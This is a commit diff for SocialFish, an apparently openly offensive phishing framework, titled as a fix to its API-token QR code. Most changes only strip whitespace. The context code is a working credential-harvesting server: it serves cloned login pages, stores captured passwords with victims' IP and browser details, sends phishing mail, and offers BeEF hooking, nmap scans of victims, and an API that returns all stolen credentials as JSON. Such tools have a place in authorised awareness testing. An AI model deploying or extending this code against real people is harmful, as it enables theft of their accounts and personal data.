fix qrcode revoke function

SocialFish.py

@@ -28,7 +28,7 @@
 users = {argv[1]: {'password': argv[2]}}
 
 # Definicoes do flask
-app = Flask(__name__, static_url_path='', 
+app = Flask(__name__, static_url_path='',
             static_folder='templates/static')
 app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
 
@@ -55,14 +55,14 @@ def countCreds():
 # Conta o numero de visitantes que nao foram pegos no phishing
 def countNotPickedUp():
     count = 0
-    
+
     cur = g.db
     select_clicks = cur.execute("SELECT clicks FROM socialfish where id = 1")
 
     for i in select_clicks:
         count = i[0]
 
-    count = count - countCreds() 
+    count = count - countCreds()
     return count
 
 #----------------------------------------
@@ -103,7 +103,7 @@ def request_loader(request):
 @app.route('/neptune', methods=['GET', 'POST'])
 def admin():
     # se a requisicao for get
-    if request.method == 'GET':        
+    if request.method == 'GET':
         # se o usuario estiver logado retorna para a pagina de credenciais
         if flask_login.current_user.is_authenticated:
             return redirect('/creds')
@@ -143,7 +143,7 @@ def getLogin():
         g.db.commit()
         template_path = 'fake/{}/{}/index.html'.format(agent, o)
         return render_template(template_path)
-    # caso seja a url padrao 
+    # caso seja a url padrao
     elif url == 'https://github.com/UndeadSec/SocialFish':
         return render_template('default.html')
     # caso seja configurada para custom
@@ -176,7 +176,7 @@ def postData():
 @app.route('/configure', methods=['POST'])
 def echo():
     global url, red, sta, beef
-    red = request.form['red']  
+    red = request.form['red']
     sta = request.form['status']
     beef = request.form['beef']
 
@@ -202,11 +202,11 @@ def echo():
 @app.route("/creds")
 @flask_login.login_required
 def getCreds():
-    cur = g.db    
+    cur = g.db
     attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]
     clicks = cur.execute("SELECT clicks FROM socialfish where id = 1").fetchone()[0]
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]        
-    data = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc").fetchall()    
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
+    data = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc").fetchall()
     return render_template('admin/index.html', data=data, clicks=clicks, countCreds=countCreds, countNotPickedUp=countNotPickedUp, attacks=attacks, tokenapi=tokenapi)
 
 # pagina para envio de emails
@@ -235,7 +235,7 @@ def getMail():
         g.db.commit()
         return redirect('/mail')
 
-# Rota para consulta de log 
+# Rota para consulta de log
 @app.route("/single/<id>", methods=['GET'])
 @flask_login.login_required
 def getSingleCred(id):
@@ -246,7 +246,7 @@ def getSingleCred(id):
         if len(credInfo) > 0:
             return render_template('admin/singlecred.html', credInfo=credInfo)
         else:
-            return "Not found"    
+            return "Not found"
     except:
         return "Bad parameter"
 
@@ -256,15 +256,15 @@ def getSingleCred(id):
 def getTraceIp(ip):
     try:
         traceIp = tracegeoIp(ip)
-        return render_template('admin/traceIp.html', traceIp=traceIp, ip=ip)   
+        return render_template('admin/traceIp.html', traceIp=traceIp, ip=ip)
     except:
         return "Network Error"
 
 # rota para scan do nmap
 @app.route("/scansf/<ip>", methods=['GET'])
 @flask_login.login_required
 def getScanSf(ip):
-    return render_template('admin/scansf.html', nScan=nScan, ip=ip)   
+    return render_template('admin/scansf.html', nScan=nScan, ip=ip)
 
 # rota post para revogar o token da api
 @app.route("/revokeToken", methods=['POST'])
@@ -276,7 +276,8 @@ def revokeToken():
         upsql = "UPDATE socialfish SET token = '{}' where id = 1".format(genToken())
         cur.execute(upsql)
         g.db.commit()
-        genQRCode(revoked=True)
+        token = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
+        genQRCode(token, revoked=True)
     return redirect('/creds')
 
 # pagina para gerar relatorios
@@ -288,7 +289,7 @@ def getReport():
         urls = cur.execute("SELECT DISTINCT url FROM creds").fetchall()
         users = cur.execute("SELECT name FROM professionals").fetchall()
         companies = cur.execute("SELECT name FROM companies").fetchall()
-        uniqueUrls = []        
+        uniqueUrls = []
         for u in urls:
             if u not in uniqueUrls:
                 uniqueUrls.append(u[0])
@@ -297,7 +298,7 @@ def getReport():
         subject = request.form['subject']
         user = request.form['selectUser']
         company = request.form['selectCompany']
-        date_range = request.form['datefilter']    
+        date_range = request.form['datefilter']
         target = request.form['selectTarget']
         _target = 'All' if target=='0' else target
         genReport(DATABASE, subject, user, company, date_range, _target)
@@ -308,7 +309,7 @@ def getReport():
 @app.route("/professionals", methods=['GET', 'POST'])
 @flask_login.login_required
 def getProfessionals():
-    if request.method == 'GET':        
+    if request.method == 'GET':
         return render_template('admin/professionals.html')
     if request.method == 'POST':
         name = request.form['name']
@@ -325,7 +326,7 @@ def getProfessionals():
 @app.route("/companies", methods=['GET', 'POST'])
 @flask_login.login_required
 def getCompanies():
-    if request.method == 'GET':        
+    if request.method == 'GET':
         return render_template('admin/companies.html')
     if request.method == 'POST':
         name = request.form['name']
@@ -344,7 +345,7 @@ def getCompanies():
 @app.route("/sfusers/", methods=['GET'])
 @flask_login.login_required
 def getSfUsers():
-    return render_template('admin/sfusers.html')   
+    return render_template('admin/sfusers.html')
 
 #--------------------------------------------------------------------------------------------------------------------------------
 #LOGIN VIEWS
@@ -361,36 +362,36 @@ def unauthorized_handler():
 #--------------------------------------------------------------------------------------------------------------------------------
 # MOBILE API
 
-# VERIFICAR CHAVE 
+# VERIFICAR CHAVE
 @app.route("/api/checkKey/<key>", methods=['GET'])
 def checkKey(key):
     cur = g.db
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]    
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
     if key == tokenapi:
-        status = {'status':'ok'}    
+        status = {'status':'ok'}
     else:
         status = {'status':'bad'}
     return jsonify(status)
 
 @app.route("/api/statistics/<key>", methods=['GET'])
-def getStatics(key):    
+def getStatics(key):
     cur = g.db
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]    
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
     if key == tokenapi:
         cur = g.db
-        attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]        
+        attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]
         clicks = cur.execute("SELECT clicks FROM socialfish where id = 1").fetchone()[0]
         countC = countCreds()
         countNPU = countNotPickedUp()
-        info = {'status':'ok','attacks':attacks, 'clicks':clicks, 'countCreds':countC, 'countNotPickedUp':countNPU}    
+        info = {'status':'ok','attacks':attacks, 'clicks':clicks, 'countCreds':countC, 'countNotPickedUp':countNPU}
     else:
         info = {'status':'bad'}
     return jsonify(info)
 
 @app.route("/api/getJson/<key>", methods=['GET'])
-def getJson(key): 
+def getJson(key):
     cur = g.db
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]       
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
     if key == tokenapi:
         try:
             sql = "SELECT * FROM creds"
@@ -416,13 +417,13 @@ def postConfigureApi():
     if request.is_json:
         content = request.get_json()
         cur = g.db
-        tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]  
+        tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
         if content['key'] == tokenapi:
             red = content['red']
             beef = content['beef']
             if content['sta'] == 'clone':
                 sta = 'clone'
-                url = content['url']                
+                url = content['url']
             else:
                 sta = 'custom'
                 url = 'Custom'
@@ -434,14 +435,14 @@ def postConfigureApi():
             if len(red) > 4:
                 if 'http://' not in red and 'https://' not in red:
                     red = 'http://' + red
-            else:                
+            else:
                 red = 'https://github.com/UndeadSec/SocialFish'
             cur = g.db
             cur.execute("UPDATE socialfish SET attacks = attacks + 1 where id = 1")
             g.db.commit()
             status = {'status':'ok'}
         else:
-            status = {'status':'bad'}    
+            status = {'status':'bad'}
     else:
         status = {'status':'bad'}
     return jsonify(status)
@@ -451,7 +452,7 @@ def postSendMail():
     if request.is_json:
         content = request.get_json()
         cur = g.db
-        tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]  
+        tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
         if content['key'] == tokenapi:
             subject = content['subject']
             email = content['email']
@@ -472,17 +473,17 @@ def postSendMail():
         else:
             status = {'status':'bad'}
     else:
-        status = {'status':'bad'}        
+        status = {'status':'bad'}
     return jsonify(status)
 
 @app.route("/api/trace/<key>/<ip>", methods=['GET'])
 def getTraceIpMob(key, ip):
     cur = g.db
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]  
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
     if key == tokenapi:
         try:
             traceIp = tracegeoIp(ip)
-            return jsonify(traceIp)   
+            return jsonify(traceIp)
         except:
             content = {'status':'bad'}
             return jsonify(content)
@@ -493,18 +494,18 @@ def getTraceIpMob(key, ip):
 @app.route("/api/scansf/<key>/<ip>", methods=['GET'])
 def getScanSfMob(key, ip):
     cur = g.db
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]  
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
     if key == tokenapi:
         return jsonify(nScan(ip))
     else:
         content = {'status':'bad'}
-        return jsonify(content)        
+        return jsonify(content)
 
 @app.route("/api/infoReport/<key>", methods=['GET'])
 def getReportMob(key):
     cur = g.db
-    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]  
-    if key == tokenapi:        
+    tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
+    if key == tokenapi:
         urls = cur.execute("SELECT url FROM creds").fetchall()
         users = cur.execute("SELECT name FROM professionals").fetchall()
         comp = cur.execute("SELECT name FROM companies").fetchall()
@@ -517,25 +518,25 @@ def getReportMob(key):
             professionals.append(p[0])
         for u in urls:
             if u not in uniqueUrls:
-                uniqueUrls.append(u[0])                        
+                uniqueUrls.append(u[0])
         info = {'urls':uniqueUrls,'professionals':professionals, 'companies':companies}
         return jsonify(info)
     else:
-        return jsonify({'status':'bad'})        
-    
+        return jsonify({'status':'bad'})
+
 #--------------------------------------------------------------------------------------------------------------------------------
 def main():
         if version_info<(3,0,0):
             print('[!] Please use Python 3. $ python3 SocialFish.py')
-            exit(0)        
+            exit(0)
         head()
         cleanFake()
-        # Inicia o banco        
+        # Inicia o banco
         initDB(DATABASE)
         app.run(host="0.0.0.0", port=5000)
 
 if __name__ == "__main__":
-    try:        
+    try:
         main()
     except KeyboardInterrupt:
         exit(0)

core/genToken.py

@@ -6,13 +6,13 @@
 def genToken():
     return ''.join(secrets.token_urlsafe(16))
 
-def genQRCode(revoked=False):
+def genQRCode(token, revoked=False):
 	qr = 'templates/static/token/qrcode.svg'
 	if revoked:
 		os.remove(qr)
 	if not os.path.exists(qr):
 		factory = qrcode.image.svg.SvgImage
-		img = qrcode.make(genToken(), image_factory=factory)
+		img = qrcode.make(token, image_factory=factory)
 		img.save(qr)
 	else:
 		os.remove(qr)